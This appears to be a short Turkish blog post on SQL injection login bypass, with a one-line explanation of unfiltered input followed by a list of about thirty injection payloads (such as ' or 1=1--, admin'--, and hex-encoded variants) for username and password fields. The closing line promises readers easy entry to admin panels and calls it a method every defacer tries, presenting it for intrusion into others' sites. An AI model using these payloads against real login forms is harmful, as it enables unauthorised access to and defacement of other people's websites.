Sql Injection Login Bypass Nedir ?

Sql Injection Login Bypass Nedir ? 



Girilen Zararlı Karakterlerin Filtrelenmemesinden Dolayı Kaynaklanan Açıktır.Aynı Sql Injectiondaki Gibi Veri Tabanından Bilgi Çekmek İçin Kullanılan Komutlar İle Siteye Giriş Yapılır.Buradaki Amaç Komutları Username ve Password Kısmına Yazarak Siteye Giriş Yapmaktır.





User ve Pass Kısmına Altaki kodları yazarsak


User: 'or'
Pass: 'or'

Bu Komutları Yazarak Girişimizi Sağlayabiliriz.Bu Komutlar Haricinde Başka Komutlarıda Deneyebilirsiniz.

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--


*Bu kodlar hexlenerekte çoğaltılabilir*

Evet arkadaşlar bu kodlarla hiç zorlanmadan admin panele girebilrisiniz her defacerin denediği bir yöntemdir başta uyguladığımız pentestler bunlardır.














Yorum Gönder

2 Yorumlar